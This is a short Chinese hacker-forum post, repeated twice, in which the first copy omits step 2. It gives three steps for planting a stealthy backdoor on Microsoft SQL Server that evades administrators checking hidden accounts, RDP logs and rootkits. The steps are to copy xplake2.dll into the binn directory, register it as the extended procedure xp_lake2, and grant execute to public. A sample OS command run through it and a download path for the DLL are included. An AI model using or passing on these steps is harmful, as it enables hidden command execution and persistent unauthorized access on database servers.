鉴于现在管理员非常厉害,还会查隐藏帐户、还会查3389登陆日志、还会查Rootkit、还会查SQL LOG。
真TMD BT。新发现一个后门非常隐藏---------------
简单三步:
1、将xplake2.dll复制到
Microsoft SQL server\mssql\binn目录
2、运行如下命令:
3、运行如下命令:
GRANT exec
on xp_lake2
To public
-----------------------------------------
OK:
测试方法:
Exec xp_lake2 'dir >c:\qq.txt'
/Files/allyesno/xplake2.rar
真TMD BT。新发现一个后门非常隐藏---------------
简单三步:
1、将xplake2.dll复制到
Microsoft SQL server\mssql\binn目录
2、运行如下命令:
USE master
EXEC sp_addextendedproc 'xp_lake2', 'xplake2.dll'
3、运行如下命令:
GRANT exec
on xp_lake2
To public
-----------------------------------------
OK:
测试方法:
Exec xp_lake2 'dir >c:\qq.txt'
/Files/allyesno/xplake2.rar
